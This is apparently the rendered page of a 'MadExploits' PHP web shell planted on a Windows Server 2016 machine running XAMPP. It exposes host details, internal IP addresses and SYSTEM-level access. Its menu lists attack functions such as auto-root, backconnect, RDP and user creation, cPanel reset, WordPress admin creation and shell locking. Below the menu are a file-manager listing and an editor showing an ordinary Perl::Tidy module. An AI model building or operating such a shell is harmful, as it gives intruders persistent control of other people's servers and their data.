Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Perl /
Tidy /
[ HOME SHELL ]
Name
Size
Permission
Action
VerticalAligner
[ DIR ]
drwxrwxrwx
Debugger.pm
3.5
KB
-rw-rw-rw-
DevNull.pm
391
B
-rw-rw-rw-
Diagnostics.pm
1.92
KB
-rw-rw-rw-
FileWriter.pm
6.84
KB
-rw-rw-rw-
Formatter.pm
672.95
KB
-rw-rw-rw-
HtmlWriter.pm
48.41
KB
-rw-rw-rw-
IOScalar.pm
2.61
KB
-rw-rw-rw-
IOScalarArray.pm
2.16
KB
-rw-rw-rw-
IndentationItem.pm
6.87
KB
-rw-rw-rw-
LineBuffer.pm
1.48
KB
-rw-rw-rw-
LineSink.pm
2.58
KB
-rw-rw-rw-
LineSource.pm
2.81
KB
-rw-rw-rw-
Logger.pm
17.13
KB
-rw-rw-rw-
Tokenizer.pm
286.9
KB
-rw-rw-rw-
VerticalAligner.pm
149.48
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Diagnostics.pm
##################################################################### # # The Perl::Tidy::Diagnostics class writes the DIAGNOSTICS file, which is # useful for program development. # # Only one such file is created regardless of the number of input # files processed. This allows the results of processing many files # to be summarized in a single file. # Output messages go to a file named DIAGNOSTICS, where # they are labeled by file and line. This allows many files to be # scanned at once for some particular condition of interest. It was # particularly useful for developing guessing strategies. # # NOTE: This feature is deactivated in final releases but can be # reactivated for debugging by un-commenting the 'I' options flag # ##################################################################### package Perl::Tidy::Diagnostics; use strict; use warnings; our $VERSION = '20200619'; sub new { my $class = shift; return bless { _write_diagnostics_count => 0, _last_diagnostic_file => "", _input_file => "", _fh => undef, }, $class; } sub set_input_file { my ( $self, $input_file ) = @_; $self->{_input_file} = $input_file; return; } sub write_diagnostics { my ( $self, $msg ) = @_; unless ( $self->{_write_diagnostics_count} ) { open( $self->{_fh}, ">", "DIAGNOSTICS" ) or Perl::Tidy::Die("couldn't open DIAGNOSTICS: $!\n"); } my $fh = $self->{_fh}; my $last_diagnostic_file = $self->{_last_diagnostic_file}; my $input_file = $self->{_input_file}; if ( $last_diagnostic_file ne $input_file ) { $fh->print("\nFILE:$input_file\n"); } $self->{_last_diagnostic_file} = $input_file; my $input_line_number = Perl::Tidy::Tokenizer::get_input_line_number(); $fh->print("$input_line_number:\t$msg"); $self->{_write_diagnostics_count}++; return; } 1;
Close